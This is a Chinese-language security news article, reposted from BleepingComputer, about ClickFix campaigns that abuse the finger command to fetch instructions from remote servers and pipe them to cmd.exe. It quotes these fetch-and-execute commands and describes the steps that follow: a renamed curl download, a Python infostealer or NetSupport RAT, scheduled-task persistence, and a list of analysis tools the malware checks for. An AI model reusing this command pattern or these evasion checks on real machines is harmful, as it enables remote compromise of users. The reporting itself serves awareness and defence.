导语:此类finger命令滥用活动似乎由单一威胁者发起,且主要通过ClickFix攻击实施。但鉴于仍有用户持续上当,相关攻击活动需引起高度警惕。
有着数十年历史的finger协议正重新活跃,威胁者借助这一协议获取远程指令,在Windows设备上执行恶意操作。
过去,人们通过Finger协议,在Unix与Linux系统中使用finger命令查询本地及远程用户信息,该命令后续也被加入Windows系统。尽管目前仍受支持,但相较于数十年前的普及度,如今其使用率已大幅下降。
执行finger命令后,会返回用户的基础信息,包括登录名、用户名(若在/etc/passwd中设置)、主目录、电话号码、最后活跃时间及其他详情。
手指命令输出
近期,多起恶意攻击活动开始利用Finger协议,疑似通过“ClickFix攻击”获取指令并在设备上执行。
这并非finger命令首次被如此滥用——早在2020年,研究人员就曾发出警告,指出该命令已被用作“ Living-off-the-Land Binary( LOLBIN,合法系统工具滥用)”,用于下载恶意软件并规避检测。
finger命令遭恶意滥用
上月,网络安全研究员分享了一个批处理文件。该文件执行后,会运行“finger [email protected][.]com”命令,从远程finger服务器获取指令,再通过管道符传递给cmd.exe在本地执行。
手指命令输出
目前该服务器已无法访问,但MalwareHunterTeam又发现了更多利用finger命令的恶意软件样本与攻击活动。例如,Reddit平台上有用户近期发文警示,称自己遭遇了一场伪装成验证码验证的ClickFix攻击——攻击者诱导其运行一条Windows命令,以“证明自己是人类”。
尽管目前该服务器已不再响应finger请求,但另一位Reddit用户捕获了此前的输出结果。这类攻击将Finger协议用作远程脚本传输工具:通过运行“finger [email protected][.]org”命令,将输出结果通过管道符传递给Windows命令处理器cmd.exe。
这一操作会触发获取到的指令执行:创建随机命名的路径,将curl.exe复制为随机文件名,通过重命名后的curl程序从cloudmega[.]org下载伪装成PDF文件的压缩包,并解压出一个Python恶意软件包。
伪装成PDF的档案内容
随后,系统会通过“pythonw.exe __init__.py”命令执行该Python程序。最终执行的指令会向攻击者的服务器回传“执行成功”的确认信息,同时向用户显示伪造的“验证你是人类”提示框。
目前尚不清楚该Python恶意软件包的具体用途,但从一个关联批处理文件可推断,其应为一款信息窃取工具。
安全员还发现了另一项类似攻击活动:通过“finger [email protected] | cmd”命令获取并执行指令,操作流程与上述ClickFix攻击几乎一致。
finger命令的输出
分析发现,这一攻击手段更为成熟——指令会先检测设备中是否存在恶意软件研究常用工具,若发现则终止攻击。这些工具包括filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg及ProcessHacker。
若未检测到恶意软件分析工具,指令会下载伪装成PDF的压缩包并解压。但与此前不同的是,该压缩包中并非Python恶意软件包,而是NetSupport Manager远程访问工具(RAT)安装包。
NetSupport Manager RAT
随后,指令会配置一个计划任务,确保用户登录时自动启动该远程访问恶意软件。
目前来看,此类finger命令滥用活动似乎由单一威胁者发起,且主要通过ClickFix攻击实施。但鉴于仍有用户持续上当,相关攻击活动需引起高度警惕。
对于防御方而言,阻止finger命令滥用的最佳方式是拦截流向TCP 79端口的出站流量——该端口是Finger协议用于连接守护进程的专用端口。
文章来源自:https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/如若转载,请注明原文地址
